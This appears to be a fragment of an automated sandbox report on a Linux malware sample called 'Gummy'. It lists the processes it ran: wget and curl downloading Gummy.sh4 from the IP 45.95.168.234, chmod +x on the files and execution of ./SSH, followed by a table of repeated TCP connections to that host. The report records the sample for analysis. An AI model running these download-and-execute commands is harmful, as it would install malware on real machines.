/tmp/SSH

[./SSH Gummy-SSH]

/usr/bin/wget

[wget http://45.95.168.234/bins/Gummy.sh4]

/usr/bin/curl

[curl -O http://45.95.168.234/bins/Gummy.sh4]

/bin/cat

[cat Gummy.sh4]

/bin/chmod

[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]

/tmp/SSH

[./SSH Gummy-SSH]

Network

Country Destination Domain Proto
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp
HR 45.95.168.234:80 tcp

Files

N/A